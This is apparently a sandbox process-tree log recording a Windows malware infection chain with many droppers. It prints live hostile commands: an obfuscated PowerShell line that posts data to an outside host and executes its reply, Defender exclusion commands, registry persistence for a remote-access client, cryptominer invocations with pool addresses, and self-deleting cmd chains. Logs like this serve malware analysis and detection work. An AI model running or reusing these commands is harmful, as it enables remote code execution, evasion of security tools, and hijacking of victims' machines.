C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Program Files\javcse\install.vbs"12⤵PID:3940
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" "C:\Program Files\javcse\install.dll",install13⤵PID:2848
-
-
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\guihuali-game.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\guihuali-game.exe"11⤵PID:1604
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Program Files\unins.vbs"12⤵PID:2112
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" "C:\Program Files\unins0000.dll",install13⤵PID:4484
-
-
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\HookSetp.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\HookSetp.exe"11⤵PID:4028
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\Three.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\Three.exe"11⤵PID:5184
-
C:\Users\Admin\AppData\Local\Temp\KSIZXGL2QC\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\KSIZXGL2QC\multitimer.exe" 0 306065bb10421b26.04333812 0 10312⤵PID:2480
-
C:\Users\Admin\AppData\Local\Temp\KSIZXGL2QC\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\KSIZXGL2QC\multitimer.exe" 1 3.1617537468.6069a9bcb2a7d 10313⤵PID:4432
-
C:\Users\Admin\AppData\Local\Temp\KSIZXGL2QC\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\KSIZXGL2QC\multitimer.exe" 2 3.1617537468.6069a9bcb2a7d14⤵PID:3636
-
C:\Users\Admin\AppData\Local\Temp\tfqolxbljx3\vict.exe"C:\Users\Admin\AppData\Local\Temp\tfqolxbljx3\vict.exe" /VERYSILENT /id=53515⤵PID:6896
-
C:\Users\Admin\AppData\Local\Temp\is-9SLQQ.tmp\vict.tmp"C:\Users\Admin\AppData\Local\Temp\is-9SLQQ.tmp\vict.tmp" /SL5="$20174,870426,780800,C:\Users\Admin\AppData\Local\Temp\tfqolxbljx3\vict.exe" /VERYSILENT /id=53516⤵PID:6964
-
C:\Users\Admin\AppData\Local\Temp\is-IPH9I.tmp\win1host.exe"C:\Users\Admin\AppData\Local\Temp\is-IPH9I.tmp\win1host.exe" 53517⤵PID:4856
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\2fmcz2ih0dd\Setup3310.exe"C:\Users\Admin\AppData\Local\Temp\2fmcz2ih0dd\Setup3310.exe" /Verysilent /subid=57715⤵PID:6908
-
C:\Users\Admin\AppData\Local\Temp\is-O1KEC.tmp\Setup3310.tmp"C:\Users\Admin\AppData\Local\Temp\is-O1KEC.tmp\Setup3310.tmp" /SL5="$3017E,138429,56832,C:\Users\Admin\AppData\Local\Temp\2fmcz2ih0dd\Setup3310.exe" /Verysilent /subid=57716⤵PID:6972
-
C:\Users\Admin\AppData\Local\Temp\is-OBLUK.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-OBLUK.tmp\Setup.exe" /Verysilent17⤵PID:3100
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\kwygqxotsrm\app.exe"C:\Users\Admin\AppData\Local\Temp\kwygqxotsrm\app.exe" /8-2315⤵PID:2716
-
C:\Users\Admin\AppData\Local\Temp\kwygqxotsrm\app.exe"C:\Users\Admin\AppData\Local\Temp\kwygqxotsrm\app.exe" /8-2316⤵PID:6712
-
-
-
C:\Users\Admin\AppData\Local\Temp\zjxl5qe1iqb\vpn.exe"C:\Users\Admin\AppData\Local\Temp\zjxl5qe1iqb\vpn.exe" /silent /subid=48215⤵PID:3368
-
C:\Users\Admin\AppData\Local\Temp\is-ETTSG.tmp\vpn.tmp"C:\Users\Admin\AppData\Local\Temp\is-ETTSG.tmp\vpn.tmp" /SL5="$40176,15170975,270336,C:\Users\Admin\AppData\Local\Temp\zjxl5qe1iqb\vpn.exe" /silent /subid=48216⤵PID:6732
-
-
-
C:\Users\Admin\AppData\Local\Temp\kqfvaajb15p\drk0rernfzh.exe"C:\Users\Admin\AppData\Local\Temp\kqfvaajb15p\drk0rernfzh.exe" /ustwo INSTALL15⤵PID:4820
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "drk0rernfzh.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\kqfvaajb15p\drk0rernfzh.exe" & exit16⤵PID:2228
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "drk0rernfzh.exe" /f17⤵
- Kills process with taskkill
PID:6572
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\444e0tev4gn\cpyrix.exe"C:\Users\Admin\AppData\Local\Temp\444e0tev4gn\cpyrix.exe" /VERYSILENT15⤵PID:5780
-
C:\Users\Admin\AppData\Roaming\1.exeC:\Users\Admin\AppData\Roaming\1.exe16⤵PID:6536
-
C:\Users\Admin\AppData\Local\Temp\16ff0dd2-caaf-456d-996f-620fa066c835\AdvancedRun.exe"C:\Users\Admin\AppData\Local\Temp\16ff0dd2-caaf-456d-996f-620fa066c835\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\16ff0dd2-caaf-456d-996f-620fa066c835\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run17⤵PID:7012
-
C:\Users\Admin\AppData\Local\Temp\16ff0dd2-caaf-456d-996f-620fa066c835\AdvancedRun.exe"C:\Users\Admin\AppData\Local\Temp\16ff0dd2-caaf-456d-996f-620fa066c835\AdvancedRun.exe" /SpecialRun 4101d8 701218⤵PID:5932
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\1.exe" -Force17⤵PID:2436
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c timeout 117⤵PID:6208
-
C:\Windows\SysWOW64\timeout.exetimeout 118⤵
- Delays execution with timeout.exe
PID:6780
-
-
-
C:\Users\Admin\AppData\Roaming\1.exe"C:\Users\Admin\AppData\Roaming\1.exe"17⤵PID:3740
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6536 -s 104017⤵
- Program crash
PID:6660
-
-
-
C:\Users\Admin\AppData\Roaming\2.exeC:\Users\Admin\AppData\Roaming\2.exe16⤵PID:6460
-
C:\Users\Admin\AppData\Roaming\2.exe"{path}"17⤵PID:6292
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\8N7O3S175Z\setups.exe"C:\Users\Admin\AppData\Local\Temp\8N7O3S175Z\setups.exe" ll12⤵PID:5896
-
C:\Users\Admin\AppData\Local\Temp\is-V5ETO.tmp\setups.tmp"C:\Users\Admin\AppData\Local\Temp\is-V5ETO.tmp\setups.tmp" /SL5="$20322,454998,229376,C:\Users\Admin\AppData\Local\Temp\8N7O3S175Z\setups.exe" ll13⤵PID:5652
-
-
-
-
C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\f49msXwaGcZo.exe"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\f49msXwaGcZo.exe"11⤵PID:5496
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe12⤵PID:3984
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\4ssvwxsyqax\cpyrix.exe"C:\Users\Admin\AppData\Local\Temp\4ssvwxsyqax\cpyrix.exe" /VERYSILENT8⤵PID:3424
-
C:\Users\Admin\AppData\Roaming\1.exeC:\Users\Admin\AppData\Roaming\1.exe9⤵PID:6104
-
C:\Users\Admin\AppData\Local\Temp\d78ef94b-d441-407a-97a6-dfe02ad204d7\AdvancedRun.exe"C:\Users\Admin\AppData\Local\Temp\d78ef94b-d441-407a-97a6-dfe02ad204d7\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\d78ef94b-d441-407a-97a6-dfe02ad204d7\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run10⤵PID:1684
-
C:\Users\Admin\AppData\Local\Temp\d78ef94b-d441-407a-97a6-dfe02ad204d7\AdvancedRun.exe"C:\Users\Admin\AppData\Local\Temp\d78ef94b-d441-407a-97a6-dfe02ad204d7\AdvancedRun.exe" /SpecialRun 4101d8 168411⤵PID:64
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\1.exe" -Force10⤵PID:2468
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c timeout 110⤵PID:1436
-
C:\Windows\SysWOW64\timeout.exetimeout 111⤵
- Delays execution with timeout.exe
PID:6024
-
-
-
C:\Users\Admin\AppData\Roaming\1.exe"C:\Users\Admin\AppData\Roaming\1.exe"10⤵PID:3680
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6104 -s 181210⤵
- Program crash
PID:1984
-
-
-
C:\Users\Admin\AppData\Roaming\2.exeC:\Users\Admin\AppData\Roaming\2.exe9⤵PID:5516
-
C:\Users\Admin\AppData\Roaming\2.exe"{path}"10⤵PID:3384
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\5034jyjjegz\s23mtsvbdzr.exe"C:\Users\Admin\AppData\Local\Temp\5034jyjjegz\s23mtsvbdzr.exe" /ustwo INSTALL8⤵PID:5136
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "s23mtsvbdzr.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\5034jyjjegz\s23mtsvbdzr.exe" & exit9⤵PID:1064
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "s23mtsvbdzr.exe" /f10⤵
- Kills process with taskkill
PID:1420
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\z2j1yr30ysw\gdxqjd0yhra.exe"C:\Users\Admin\AppData\Local\Temp\z2j1yr30ysw\gdxqjd0yhra.exe" /VERYSILENT8⤵PID:3180
-
-
C:\Users\Admin\AppData\Local\Temp\41dtehnxlya\vict.exe"C:\Users\Admin\AppData\Local\Temp\41dtehnxlya\vict.exe" /VERYSILENT /id=5358⤵PID:5204
-
C:\Users\Admin\AppData\Local\Temp\is-3CNOK.tmp\vict.tmp"C:\Users\Admin\AppData\Local\Temp\is-3CNOK.tmp\vict.tmp" /SL5="$2035C,870426,780800,C:\Users\Admin\AppData\Local\Temp\41dtehnxlya\vict.exe" /VERYSILENT /id=5359⤵PID:5304
-
C:\Users\Admin\AppData\Local\Temp\is-5G2QM.tmp\win1host.exe"C:\Users\Admin\AppData\Local\Temp\is-5G2QM.tmp\win1host.exe" 53510⤵PID:5864
-
C:\Users\Admin\AppData\Local\Temp\XHGo4sqx2.exe"C:\Users\Admin\AppData\Local\Temp\XHGo4sqx2.exe"11⤵PID:4696
-
C:\Windows\SysWOW64\at.exe"C:\Windows\System32\at.exe"12⤵PID:4912
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\Windows\System32\cmd.exe < Marito.gif12⤵PID:5776
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\System32\cmd.exe13⤵PID:4200
-
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5864 -s 150011⤵
- Program crash
PID:3504
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\elcbgd25wkf\lm2qlgqiiin.exe"C:\Users\Admin\AppData\Local\Temp\elcbgd25wkf\lm2qlgqiiin.exe"8⤵PID:5352
-
C:\Windows\SysWOW64\cmd.execmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\elcbgd25wkf\lm2qlgqiiin.exe"9⤵PID:5904
-
C:\Windows\SysWOW64\PING.EXEping 1.1.1.1 -n 1 -w 300010⤵
- Runs ping.exe
PID:4488
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\lrsaotlw2gi\app.exe"C:\Users\Admin\AppData\Local\Temp\lrsaotlw2gi\app.exe" /8-238⤵PID:5444
-
C:\Users\Admin\AppData\Local\Temp\lrsaotlw2gi\app.exe"C:\Users\Admin\AppData\Local\Temp\lrsaotlw2gi\app.exe" /8-239⤵PID:6620
-
-
-
C:\Users\Admin\AppData\Local\Temp\lkvuxtcegxm\vpn.exe"C:\Users\Admin\AppData\Local\Temp\lkvuxtcegxm\vpn.exe" /silent /subid=4828⤵PID:5556
-
C:\Users\Admin\AppData\Local\Temp\is-BP4E0.tmp\vpn.tmp"C:\Users\Admin\AppData\Local\Temp\is-BP4E0.tmp\vpn.tmp" /SL5="$20470,15170975,270336,C:\Users\Admin\AppData\Local\Temp\lkvuxtcegxm\vpn.exe" /silent /subid=4829⤵PID:5608
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\uninstall.bat" "10⤵PID:5836
-
C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exetapinstall.exe remove tap090111⤵PID:4204
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\install.bat" "10⤵PID:4452
-
C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exetapinstall.exe install OemVista.inf tap090111⤵PID:3652
-
-
-
C:\Program Files (x86)\MaskVPN\mask_svc.exe"C:\Program Files (x86)\MaskVPN\mask_svc.exe" uninstall10⤵PID:6384
-
-
C:\Program Files (x86)\MaskVPN\mask_svc.exe"C:\Program Files (x86)\MaskVPN\mask_svc.exe" install10⤵PID:7772
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\yfpkdhxvjmw\jjk10skf3n3.exe"C:\Users\Admin\AppData\Local\Temp\yfpkdhxvjmw\jjk10skf3n3.exe" /quiet SILENT=1 AF=7568⤵PID:5672
-
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Weather\Weather 1.0.0\install\FD7DF1F\Weather Installation.msi" /quiet SILENT=1 AF=756 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\yfpkdhxvjmw\jjk10skf3n3.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\yfpkdhxvjmw\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1617278300 /quiet SILENT=1 AF=756 " AF="756" AI_CONTROL_VISUAL_STYLE="16578540;16578540;14988840;12422912"9⤵PID:4988
-
-
-
C:\Users\Admin\AppData\Local\Temp\xam1rdjzm4g\IBInstaller_97039.exe"C:\Users\Admin\AppData\Local\Temp\xam1rdjzm4g\IBInstaller_97039.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs97039 -token mtn1co3fo4gs5vwq8⤵PID:5764
-
C:\Users\Admin\AppData\Local\Temp\is-8VBFR.tmp\IBInstaller_97039.tmp"C:\Users\Admin\AppData\Local\Temp\is-8VBFR.tmp\IBInstaller_97039.tmp" /SL5="$204A4,14574507,721408,C:\Users\Admin\AppData\Local\Temp\xam1rdjzm4g\IBInstaller_97039.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs97039 -token mtn1co3fo4gs5vwq9⤵PID:5940
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c expand C:\Users\Admin\AppData\Local\Temp\is-C8NIL.tmp\{app}\microsoft.cab -F:* %ProgramData%10⤵PID:6132
-
C:\Windows\SysWOW64\expand.exeexpand C:\Users\Admin\AppData\Local\Temp\is-C8NIL.tmp\{app}\microsoft.cab -F:* C:\ProgramData11⤵PID:5468
-
-
-
C:\ProgramData\regid.1993-06.com.microsoft\client32.exe"C:\ProgramData\regid.1993-06.com.microsoft\client32.exe"10⤵PID:8040
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c start http://egypthistoricart.online/pgudonqntu/zmsaksepfx.php?xdl=mtn1co3fo4gs5vwq^&cid=97039^¶m=10⤵PID:7816
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" reg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_EXPAND_SZ /d "%ProgramData%\regid.1993-06.com.microsoft\client32.exe" /f10⤵PID:7992
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\MB8BF6UN0T\setups.exe"C:\Users\Admin\AppData\Local\Temp\MB8BF6UN0T\setups.exe" ll5⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3560 -
C:\Users\Admin\AppData\Local\Temp\is-RA47I.tmp\setups.tmp"C:\Users\Admin\AppData\Local\Temp\is-RA47I.tmp\setups.tmp" /SL5="$500CA,454998,229376,C:\Users\Admin\AppData\Local\Temp\MB8BF6UN0T\setups.exe" ll6⤵
- Executes dropped EXE
- Checks computer location settings
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:1116
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\askinstall20.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\askinstall20.exe"4⤵
- Executes dropped EXE
- Modifies system certificate store
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1220 -
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe5⤵
- Suspicious use of WriteProcessMemory
PID:2508 -
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe6⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4120
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\Full_Version.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\Full_Version.exe"4⤵PID:4704
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Program Files\unins.vbs"5⤵PID:4840
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" "C:\Program Files\unins0000.dll",install6⤵PID:4960
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\file.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\file.exe"4⤵PID:4884
-
C:\Users\Admin\AppData\Roaming\8497.tmp.exe"C:\Users\Admin\AppData\Roaming\8497.tmp.exe"5⤵PID:4924
-
C:\Windows\system32\msiexec.exe-P stratum1+ssl://0xb7633a80145Ec9ce2b8b5F80AB36C783064C2E10.work@eu-eth.hiveon.net:24443 -R --response-timeout 30 --farm-retries 999996⤵PID:2484
-
-
C:\Windows\system32\msiexec.exe-o pool.supportxmr.com:8080 -u 47wDrszce6VbnMB4zhhEA1Gr3EzwHx2eS6QzC5sFoq8iGdMjnzX8bnEjBdQHsAuW8C1SNgxyGa4DQTVnQ9jfhRod73np5P8 --cpu-max-threads-hint 50 -r 99996⤵PID:2096
-
-
-
C:\Users\Admin\AppData\Roaming\85FF.tmp.exe"C:\Users\Admin\AppData\Roaming\85FF.tmp.exe"5⤵PID:3944
-
C:\Windows\SysWOW64\cmd.exe/c timeout /t 3 & del /f /q C:\Users\Admin\AppData\Roaming\85FF.tmp.exe6⤵PID:5848
-
C:\Windows\SysWOW64\timeout.exetimeout /t 37⤵
- Delays execution with timeout.exe
PID:2460
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX2\file.exe"5⤵PID:5248
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.16⤵
- Runs ping.exe
PID:5484
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\md2_2efs.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\md2_2efs.exe"4⤵PID:5416
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\BTRSetp.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\BTRSetp.exe"4⤵PID:5600
-
-
-
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:2584
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵
- Modifies Internet Explorer settings
PID:4148
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:4424
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
PID:4496
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k SystemNetworkService1⤵PID:5060
-
C:\Users\Admin\AppData\Local\Temp\is-PDLSD.tmp\gdxqjd0yhra.tmp"C:\Users\Admin\AppData\Local\Temp\is-PDLSD.tmp\gdxqjd0yhra.tmp" /SL5="$10300,2592217,780800,C:\Users\Admin\AppData\Local\Temp\z2j1yr30ysw\gdxqjd0yhra.exe" /VERYSILENT1⤵PID:4728
-
C:\Users\Admin\AppData\Local\Temp\is-P576R.tmp\winlthsth.exe"C:\Users\Admin\AppData\Local\Temp\is-P576R.tmp\winlthsth.exe"2⤵PID:5952
-
C:\Users\Admin\AppData\Local\Temp\17kxzHkXm.exe"C:\Users\Admin\AppData\Local\Temp\17kxzHkXm.exe"3⤵PID:4392
-
C:\Windows\SysWOW64\at.exe"C:\Windows\System32\at.exe"4⤵PID:5292
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\Windows\System32\cmd.exe < Marito.gif4⤵PID:3512
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\System32\cmd.exe5⤵PID:5824
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c start /B powershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#####-#ob#jec#t N#et#.W#eb#Cl#ie#nt#).###########Up#loa#dSt##########ri#ng(#''h#t#tp#:#//labsclub.com/#w#el#co#me''#,#''Cr#ys#ta#lP#ig''#############)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"3⤵PID:4680
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#####-#ob#jec#t N#et#.W#eb#Cl#ie#nt#).###########Up#loa#dSt##########ri#ng(#''h#t#tp#:#//labsclub.com/#w#el#co#me''#,#''Cr#ys#ta#lP#ig''#############)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"4⤵PID:3964
-
-
-
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵PID:5840
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 779ED80D4EBBBDEC028B02AEA42AFB47 C2⤵PID:2484
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 515ADA24C3B531C2ED38BFB58009769D2⤵PID:5596
-
-
C:\Windows\system32\werfault.exewerfault.exe /h /shared Global\0e8a47bdfdfc46c0be79cc416d127176 /t 2400 /p 23121⤵PID:4116
-
C:\Windows\explorer.exeexplorer.exe1⤵PID:5696
-
C:\Users\Admin\AppData\Local\Temp\2AD0.exeC:\Users\Admin\AppData\Local\Temp\2AD0.exe2⤵PID:2404
-
C:\Windows\SysWOW64\cmd.execmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\2AD0.exe"3⤵PID:7360
-
C:\Windows\SysWOW64\timeout.exetimeout /T 10 /NOBREAK4⤵
- Delays execution with timeout.exe
PID:7384
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\49A4.exeC:\Users\Admin\AppData\Local\Temp\49A4.exe2⤵PID:6296
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im 49A4.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\49A4.exe" & del C:\ProgramData\*.dll & exit3⤵PID:7792
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im 49A4.exe /f4⤵
- Kills process with taskkill
PID:5780
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 64⤵
- Delays execution with timeout.exe
PID:3484
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\53D6.exeC:\Users\Admin\AppData\Local\Temp\53D6.exe2⤵PID:3492
-
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe2⤵PID:5616
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe2⤵PID:7120
-
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe2⤵PID:5452
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe2⤵PID:4640
-
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe2⤵PID:6548
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe2⤵PID:4620
-
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe2⤵PID:5392
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe2⤵PID:7240
-
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe2⤵PID:7372
-
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k dcomlaunch -s DeviceInstall1⤵PID:6432
-
C:\Windows\system32\DrvInst.exeDrvInst.exe "4" "0" "C:\Users\Admin\AppData\Local\Temp\{24ead14a-ef57-3745-9165-4e3d0f093d2c}\oemvista.inf" "9" "4d14a44ff" "0000000000000164" "WinSta0\Default" "0000000000000170" "208" "c:\program files (x86)\maskvpn\driver\win764"2⤵PID:6296
-
-
C:\Windows\system32\DrvInst.exeDrvInst.exe "2" "211" "ROOT\NET\0000" "C:\Windows\INF\oem2.inf" "oemvista.inf:3beb73aff103cc24:tap0901.ndi:9.0.0.21:tap0901," "4d14a44ff" "0000000000000164"2⤵PID:3132
-
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s NetSetupSvc1⤵PID:7056
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s DsmSvc1⤵PID:6832
-
C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe"C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe" -ServerName:App.AppXtk181tbxbce2qsex02s8tw7hfxa9xb3t.mca1⤵PID:4476
-
C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe"C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe" -ServerName:CortanaUI.AppXa50dqqa5gqv4a428c9y1jjw7m3btvepj.mca1⤵PID:5756
-
C:\Program Files (x86)\MaskVPN\mask_svc.exe"C:\Program Files (x86)\MaskVPN\mask_svc.exe"1⤵PID:7276
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:4752
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s seclogon1⤵PID:3460